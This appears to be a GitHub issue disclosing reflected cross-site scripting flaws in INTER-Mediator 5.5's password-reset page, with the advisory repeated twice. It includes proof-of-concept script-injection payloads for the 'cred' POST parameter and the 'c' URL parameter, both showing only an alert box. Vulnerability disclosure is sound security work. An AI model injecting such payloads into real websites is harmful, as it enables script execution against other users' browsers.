Advisory Details:
Multiple Cross-Site Scripting (XSS) were discovered in“INTER-Mediator 5.5”, which can be exploited to execute arbitrary code.
The vulnerabilities exist due to insufficient filtration of user-supplied data in the “c” HTTP POST parameter and in the “cred” HTTP POST parameter passed to the “INTER-Mediator-master/Auth_Support/PasswordReset/resetpassword.php” URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website.
The exploitation examples below use the "alert()" JavaScript function to see a pop-up messagebox:
Poc:
(1)
POST parameter : cred
Value : " /><script>alert(1);</script><
To: http://localhost/.../INTER-Mediator-master/Auth_Support/PasswordReset/resetpassword.php
(2) http://localhost/.../INTER-Mediator-master/Auth_Support/PasswordReset/resetpassword.php?c=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22
The text was updated successfully, but these errors were encountered:
Product: INTER-Mediator
Download: https://github.com/INTER-Mediator/INTER-Mediator
Vunlerable Version: 5.5 and probably prior
Tested Version: 5.5
Author: ADLab of Venustech
Advisory Details:
Multiple Cross-Site Scripting (XSS) were discovered in“INTER-Mediator 5.5”, which can be exploited to execute arbitrary code.
The vulnerabilities exist due to insufficient filtration of user-supplied data in the “c” HTTP POST parameter and in the “cred” HTTP POST parameter passed to the “INTER-Mediator-master/Auth_Support/PasswordReset/resetpassword.php” URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website.
The exploitation examples below use the "alert()" JavaScript function to see a pop-up messagebox:
Poc:
(1)
POST parameter : cred
Value : " /><script>alert(1);</script><
To:
http://localhost/.../INTER-Mediator-master/Auth_Support/PasswordReset/resetpassword.php
(2)
http://localhost/.../INTER-Mediator-master/Auth_Support/PasswordReset/resetpassword.php?c=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22
The text was updated successfully, but these errors were encountered: